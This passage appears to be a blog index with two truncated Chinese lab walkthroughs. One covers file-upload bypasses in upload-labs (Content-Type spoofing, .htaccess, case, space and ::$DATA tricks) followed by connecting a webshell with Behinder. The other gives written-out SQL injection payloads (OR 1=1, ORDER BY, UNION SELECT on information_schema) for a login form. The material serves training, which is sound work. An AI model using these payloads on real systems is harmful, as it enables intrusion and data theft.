zkaq-upload-labs
Pass-01 前端检测文件格式,不允许上传PHP文件 bp抓包,改名 冰蝎连接 Pass-02上传文件,抓包,修改 Content-Type 冰蝎连接 Pass-03不允许上传”.asp”、”.aspx”、”.php”、”.jsp”文件 上传文件抓包 冰蝎,连接 Pass-04线上传一个.htaccess文件 该文件“告诉”后端服务器,将jpg文件当做php文件执行 上传将php一句话木马文件后缀改为jpg 上传 Pass-05大小写绕过 文件改名,后缀用大写。 冰蝎连接 Pass-06文件后缀空格绕过 冰蝎连接 Pass-07文件尾加.绕过 冰蝎连接 Pass-08 冰蝎连接,连接时将 ::$DATA...
zkaq-SQL
post注入post传参类型的注入,与get注入很像。post注入经常出现在登录框且通常是字符型。 靶场演练Pass-051构造' or 1=1 -- a 成功登录,判断的我们的输入的数据有被当做SQL语句执行。 构造 12' or 1=1 order by 3 -- a登录成功' or 1=1 order by 4 -- a登录失败 判断页面有三个字段 暴库名 构造 1'union select 1,2,database() -- a 暴表名 构造 1'union select 1,2,table_name from information_Schema.tables where table_schema=database() limit 0,1 -- a 暴字段 构造 1'union select 1,2,column_name from information_Schema.columns where table_schema=database() and...
